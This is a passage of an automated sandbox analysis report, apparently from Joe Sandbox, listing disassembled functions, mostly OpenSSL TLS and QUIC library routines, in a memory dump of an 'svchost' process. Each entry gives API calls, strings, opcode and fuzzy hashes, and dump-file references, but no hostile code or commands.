                                                                                              • Opcode Fuzzy Hash: da33691dc6dd1cb9f7b7ff8dcae513d8a162f21f9c151df262fa9d1f417888f7
                                                                                              • Instruction Fuzzy Hash: 794198B1E1E65291F762EB72E8527FE2350AF84B80F448432DE2D476B6EE3CE4458750
                                                                                              Function 00007FFBAB430B40 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3,?,-0000001F,00000000,?), ref: 00007FFBAB430B5E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3,?,-0000001F,00000000,?), ref: 00007FFBAB430B76
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3,?,-0000001F,00000000,?), ref: 00007FFBAB430B86
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3), ref: 00007FFBAB430BBC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3), ref: 00007FFBAB430BD4
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3), ref: 00007FFBAB430BE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_use_certificate$ssl\ssl_rsa.c$ssl_set_cert
                                                                                              • API String ID: 1552677711-3127846650
                                                                                              • Opcode ID: 27411270e6861773d150b3f147f4ce61720165926f59962a3fcfeb90c5a13ce7
                                                                                              • Instruction ID: 2f64b6746154bd12cb0588c3f683b0515c7a4542bbedd21f66e07be1faec505e
                                                                                              • Opcode Fuzzy Hash: 27411270e6861773d150b3f147f4ce61720165926f59962a3fcfeb90c5a13ce7
                                                                                              • Instruction Fuzzy Hash: 3C31E5B6B1964282E752DB32E9422FE6361EF447C4F588431EE6C43BFADE2CE5558700
                                                                                              Function 00007FFBAB466EF1 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Error Code: %llu$ Reason: $ (app)$ (transport)$Connection close
                                                                                              • API String ID: 4098839300-216527848
                                                                                              • Opcode ID: d7ddc8cf435bb3111548bbccbadb7f17fcf1fe5d36f9c0ed41b9eb447eb2bb56
                                                                                              • Instruction ID: 8a6456e109500bdbf91fdeb93fde6df62c3aede6d8b22a49ced3ec4258481faa
                                                                                              • Opcode Fuzzy Hash: d7ddc8cf435bb3111548bbccbadb7f17fcf1fe5d36f9c0ed41b9eb447eb2bb56
                                                                                              • Instruction Fuzzy Hash: 24213AE1B4A60384FE26DB75E9512FC2BA1AF45794F44D036DE2E472B5DE3CE08A8300
                                                                                              Function 00007FFBAB42FBE0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: C_start_jobR_newR_set_debugR_set_errorX_newX_set_callback
                                                                                              • String ID: ($ssl\ssl_lib.c$ssl_start_async_job
                                                                                              • API String ID: 3907389051-658281695
                                                                                              • Opcode ID: 0286416a0bbb87ad2c76a200c5a148f02a65b78661a6a10dd9f7a7182fca951f
                                                                                              • Instruction ID: 2ea58d055c416f196e1c995a8c25261ef25ee752ed5715d05bcf6ec4a4e546ca
                                                                                              • Opcode Fuzzy Hash: 0286416a0bbb87ad2c76a200c5a148f02a65b78661a6a10dd9f7a7182fca951f
                                                                                              • Instruction Fuzzy Hash: 82416DB1A1EA8282F7629B35E4403B93290FB01798F948235ED7D876F9DF3CE4459B11
                                                                                              Function 00007FFBAB430C20 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$X509X509_freeX509_new_exd2i_
                                                                                              • String ID: SSL_CTX_use_certificate_ASN1$ssl\ssl_rsa.c
                                                                                              • API String ID: 4137050946-3637493151
                                                                                              • Opcode ID: 3fee11c779347f01daf99bb784c709729bd0efc620f5ff9e4da98003fe4d1301
                                                                                              • Instruction ID: e45169ca9c71a3c383de4acf02b5a4d104bb144a98f6bab6b5335e150ce2c4bc
                                                                                              • Opcode Fuzzy Hash: 3fee11c779347f01daf99bb784c709729bd0efc620f5ff9e4da98003fe4d1301
                                                                                              • Instruction Fuzzy Hash: A6218662B6A54181E7A2E736E4822BE6350EF88780F549032FE6D837B6DE2CD549C700
                                                                                              Function 00007FFBAB440980 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BIO_indent.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB4409EF
                                                                                              • BIO_printf.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB440A31
                                                                                              • BIO_indent.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB440A83
                                                                                              • BIO_printf.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB440ADB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: %s, Length=%d$UNKNOWN$Unsupported, hex dump follows:$message_seq=%d, fragment_offset=%d, fragment_length=%d
                                                                                              • API String ID: 1860387303-4198474627
                                                                                              • Opcode ID: 1ee8b2b0ac70d7455294be4b66ab1d88a777fabf19244c22c1cfcb7fd7e4899a
                                                                                              • Instruction ID: 0edbfc3b598cedccd92fe5aaedbb1c4a15615464fec4d77824d456bb84515cf2
                                                                                              • Opcode Fuzzy Hash: 1ee8b2b0ac70d7455294be4b66ab1d88a777fabf19244c22c1cfcb7fd7e4899a
                                                                                              • Instruction Fuzzy Hash: FE5102B27181E146EA26CB26E494A6D7FA0EB85790F04C135EEBD43BA2CE3CC156C700
                                                                                              Function 00007FFBAB4220C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl$O_freeO_newO_s_fileR_clear_last_markR_pop_to_markR_set_markX_freeY_free
                                                                                              • String ID: PEM
                                                                                              • API String ID: 753178889-379482575
                                                                                              • Opcode ID: e927e7a33dc3b8603c3cdaf5b3c9479e23448344002fab8ad0ab43fd64048534
                                                                                              • Instruction ID: e90cb8517ce3ccd482e50d9c5f49480430359b9b47f3564613366fc62c718ad6
                                                                                              • Opcode Fuzzy Hash: e927e7a33dc3b8603c3cdaf5b3c9479e23448344002fab8ad0ab43fd64048534
                                                                                              • Instruction Fuzzy Hash: 9B416FB2A0AB4281FA269B76E44167E7290EF84BC0F049135EE6D47BA6DE3DE401D710
                                                                                              Function 00007FFBAB44E7B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_rx_check_forged_pkt_limit$forgery limit$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 2363558997-109013121
                                                                                              • Opcode ID: 5103d72ccc1721e5e6ece00c8ca9d279deb014c3c3a7ff7981f06d53f5991793
                                                                                              • Instruction ID: d866857d40a443c3266f655485de5b9db6d2e0b0e3e64b6d4c406f1b5693e8b5
                                                                                              • Opcode Fuzzy Hash: 5103d72ccc1721e5e6ece00c8ca9d279deb014c3c3a7ff7981f06d53f5991793
                                                                                              • Instruction Fuzzy Hash: 8941B4B2A0EB9282FA55EB20E4503B973A5EB84780F448135DFAD43BA5DF3CE546C704
                                                                                              Function 00007FFBAB444EA0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$N_num_bitsN_ucmpR_vset_error
                                                                                              • String ID: srp_verify_server_param$ssl\tls_srp.c
                                                                                              • API String ID: 2242215446-1772774368
                                                                                              • Opcode ID: 73d97b3cb48666df6e1ab435c8d32a358283c4f6a6a6a512923b1aa231862c96
                                                                                              • Instruction ID: 15ecbd7671a578c6fbed2cb8711058460a99f94b2955a75b95693c858ec7bd3c
                                                                                              • Opcode Fuzzy Hash: 73d97b3cb48666df6e1ab435c8d32a358283c4f6a6a6a512923b1aa231862c96
                                                                                              • Instruction Fuzzy Hash: 743180F0F4A54341FB56AB72D8A27F91350AF80B84F488431DD2D876F6DE2CE5968311
                                                                                              Function 00007FFBAB432B50 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$Y_new
                                                                                              • String ID: SSL_CTX_use_RSAPrivateKey$ssl\ssl_rsa_legacy.c
                                                                                              • API String ID: 2166683265-1409161961
                                                                                              • Opcode ID: 2a8756bd538d615ab31598c6ff8793c252482272826b21cb4106fb6848fe224d
                                                                                              • Instruction ID: 083cfbd86796a6ded14c639707a534f52d512130288ad121e00c0e04df775e22
                                                                                              • Opcode Fuzzy Hash: 2a8756bd538d615ab31598c6ff8793c252482272826b21cb4106fb6848fe224d
                                                                                              • Instruction Fuzzy Hash: CF21D6B1B5D64281EA56FB76E5821FD2351EF487C4F089434EE2D47BA7DE2CE4468700
                                                                                              Function 00007FFBAB466AEF Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Len: <implicit length>$ Offset: %llu$ Stream id: %llu
                                                                                              • API String ID: 3964688267-1947365733
                                                                                              • Opcode ID: 8093ca9b74c9643fa43f1d33d32e90ff7d11a8e74e6d4d7242e2012fa385b179
                                                                                              • Instruction ID: f05300e1ee54756cdfdf7bc6c434b9b58cadb2bb68d01705f905ac30449301fa
                                                                                              • Opcode Fuzzy Hash: 8093ca9b74c9643fa43f1d33d32e90ff7d11a8e74e6d4d7242e2012fa385b179
                                                                                              • Instruction Fuzzy Hash: C7113DE1E4A65390FE26DBB5E8613FC1760AF45788F449036DE2E171B6DE3CE5868300
                                                                                              Function 00007FFBAB43A2E0 Relevance: 18.2, APIs: 12, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_valueX509_get0_pubkeyX509_get_extension_flagsX509_get_signature_infoY_get_security_bits
                                                                                              • String ID:
                                                                                              • API String ID: 3095628011-0
                                                                                              • Opcode ID: fbcc320e21d23323723f41f44f8e4fb93ef4d914d27502601e0add2749c55346
                                                                                              • Instruction ID: 1122ce2be60c1f4885d54c7b405e49d42a5d89a0a16c2ad95e33da14b49c382f
                                                                                              • Opcode Fuzzy Hash: fbcc320e21d23323723f41f44f8e4fb93ef4d914d27502601e0add2749c55346
                                                                                              • Instruction Fuzzy Hash: CB51B6A3A5E7D242EAB69A35E4017BE6280BF95784F18C135EDBE47BE5DE3CD4004A00
                                                                                              Function 00007FFBAB48C160 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_client_certificate
                                                                                              • API String ID: 4275876640-1158595938
                                                                                              • Opcode ID: ecb36ae535def2a8a0bb8f8aae1715f9bdc2774aaefeed1e3ba6e574470dde25
                                                                                              • Instruction ID: 6088f1e72e3093ef364879f5bd285603a08fc772722b9fd4d95214e12a7f2b04
                                                                                              • Opcode Fuzzy Hash: ecb36ae535def2a8a0bb8f8aae1715f9bdc2774aaefeed1e3ba6e574470dde25
                                                                                              • Instruction Fuzzy Hash: ED5196A2F0D28281E7A2DBB6E4817BD2350EB45BC4F44C432DE6D976E6DF2CE4858711
                                                                                              Function 00007FFBAB48CFA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48CD10), ref: 00007FFBAB48CFC3
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48CD10), ref: 00007FFBAB48CFDB
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_post_process_server_rpk
                                                                                              • API String ID: 1390262125-914124065
                                                                                              • Opcode ID: a01180393a9eba5e7ea13f841cdd70baf97bfa94b40e1f20ad16e0a070db3694
                                                                                              • Instruction ID: 3f9129db68843c966c5fa11a19b33378c7db50ca400bd15a9f837abec253b95c
                                                                                              • Opcode Fuzzy Hash: a01180393a9eba5e7ea13f841cdd70baf97bfa94b40e1f20ad16e0a070db3694
                                                                                              • Instruction Fuzzy Hash: 4E515EB2A0AA4281E752DB76C4957BC2390FB84B88F54C136DE2C8B3B5DF2DD5D68710
                                                                                              Function 00007FFBAB4882B3 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                                                                                              • String ID: ssl\statem\statem.c$state_machine
                                                                                              • API String ID: 2605663294-1334640251
                                                                                              • Opcode ID: f88b4284e0f136a48fb2270b4d1d8eeff9862083b4885e9905f064b9672390eb
                                                                                              • Instruction ID: ddd60370403f931cc9279afcc263b3866f3e9fb046cc37835e6a1b9a45a0beaa
                                                                                              • Opcode Fuzzy Hash: f88b4284e0f136a48fb2270b4d1d8eeff9862083b4885e9905f064b9672390eb
                                                                                              • Instruction Fuzzy Hash: 1C41AFB1A0A242CAFA669BB5D4513BD2BA1FF40B80F48C435DE2D466B6DF3DE844C611
                                                                                              Function 00007FFBAB48AC20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB41D250: OBJ_nid2sn.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D287
                                                                                                • Part of subcall function 00007FFBAB41D250: EVP_PKEY_is_a.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2AC
                                                                                                • Part of subcall function 00007FFBAB41D250: OBJ_nid2sn.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2DE
                                                                                                • Part of subcall function 00007FFBAB41D250: EVP_PKEY_is_a.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2E9
                                                                                                • Part of subcall function 00007FFBAB41D250: OBJ_nid2ln.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2F4
                                                                                                • Part of subcall function 00007FFBAB41D250: EVP_PKEY_is_a.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2FF
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5), ref: 00007FFBAB48AC8A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5), ref: 00007FFBAB48ACA2
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB48ACDE
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB48ACF6
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB48AD4E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB48AD66
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5,?,?,?,?,?,?), ref: 00007FFBAB48AD73
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5,?,?,?,?,?,?), ref: 00007FFBAB48AD8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
